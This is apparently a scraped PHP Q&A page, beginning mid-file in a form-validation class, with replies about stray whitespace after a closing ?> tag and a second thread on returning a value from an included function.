break;
}
case "dontselect":
case "dontselectchk":
case "dontselectradio":
{
$bret = $this->validate_dontselect($input_value,
$command_value,
$default_error_message,
$variable_name);
break;
}//case
case "shouldselchk":
case "selectradio":
{
$bret = $this->validate_select($input_value,
$command_value,
$default_error_message,
$variable_name);
break;
}//case
case "selmin":
{
$min_count = intval($command_value);
if(isset($input_value))
{
if($min_count > 1)
{
$bret = (count($input_value) >= $min_count )?true:false;
}
else
{
$bret = true;
}
}
else
{
$bret= false;
$default_error_message = sprintf(E_VAL_SELMIN_CHECK_FAILED,$min_count,$variable_name);
}
break;
}//case
case "selone":
{
if(false == isset($input_value)||
strlen($input_value)<=0)
{
$bret= false;
$default_error_message = sprintf(E_VAL_SELONE_CHECK_FAILED,$variable_name);
}
break;
}
case "eqelmnt":
{
if(isset($formvariables[$command_value]) &&
strcmp($input_value,$formvariables[$command_value])==0 )
{
$bret=true;
}
else
{
$bret= false;
$default_error_message = sprintf(E_VAL_EQELMNT_CHECK_FAILED,$variable_name,$command_value);
}
break;
}
case "neelmnt":
{
if(isset($formvariables[$command_value]) &&
strcmp($input_value,$formvariables[$command_value]) !=0 )
{
$bret=true;
}
else
{
$bret= false;
$default_error_message = sprintf(E_VAL_NEELMNT_CHECK_FAILED,$variable_name,$command_value);
}
break;
}
}//switch
return $bret;
}//validdate command
}?>
after .the }?>
if you select all (Ctrl+A) you will see the white space proceeding the ?>
There is likely whitespace after the closing ?> tag. It's become quite common practice to leave off the ending ?> tag to prevent this exactly issue. But that can only be done in files that contain only code in classes, no procedural code.
To add on to RobertPitt, if your file is solely PHP only, add the <?php at the start, and remove the ?> to prevent careless whitespaces at the back.
I have a page that includes/embeds a file that contains a number of functions.
One of the functions has a variable I want to pass back onto the page that the file is embedded on.
<?php
include('functions.php');
userInGroup();
if($user_in_group) {
print 'user is in group';
} else {
print 'user is not in group';
}
?>
function within functions.php
<?php
function userInGroup() {
foreach($group_access as $i => $group) {
if($group_session == $group) {
$user_in_group = TRUE;
break;
} else {
$user_in_group = FALSE;
}
}
}?>
I am unsure as to how I can pass the value from the function userInGroup back to the page it runs the conditional if($user_in_group) on
Any help is appreciated.
Update:
I am userInGroup(array("STAFF","STUDENTS","FACULTY"));
which then is
<?php
function userInGroup($group_access) {
session_start();
if(isset($_SESSION['user_session'])) {
$username = $_SESSION['user_session'];
$group_session = $_SESSION['group_session'];
$user_full_name = $_SESSION['user_full_name'];
foreach($group_access as $i => $group) {
if($group_session == $group) {
$user_in_group = TRUE;
break;
} else {
$user_in_group = FALSE;
}
} return $user_in_group;
} else {
print 'not logged in';
}
?>
Easiest way:
$user_in_group = userInGroup();
function userInGroup() {
foreach($group_access as $i => $group) {
if($group_session == $group) {
$user_in_group = TRUE;
break;
} else {
$user_in_group == FALSE;
}
}
return $user_in_group;
}
Use the return statement.
You can use your original function with one minor modification:
<?php
function userInGroup() {
**global $user_in_group;**
foreach($group_access as $i => $group) {
if($group_session == $group) {
$user_in_group = TRUE;
break;
} else {
$user_in_group = FALSE;
}
}
}?>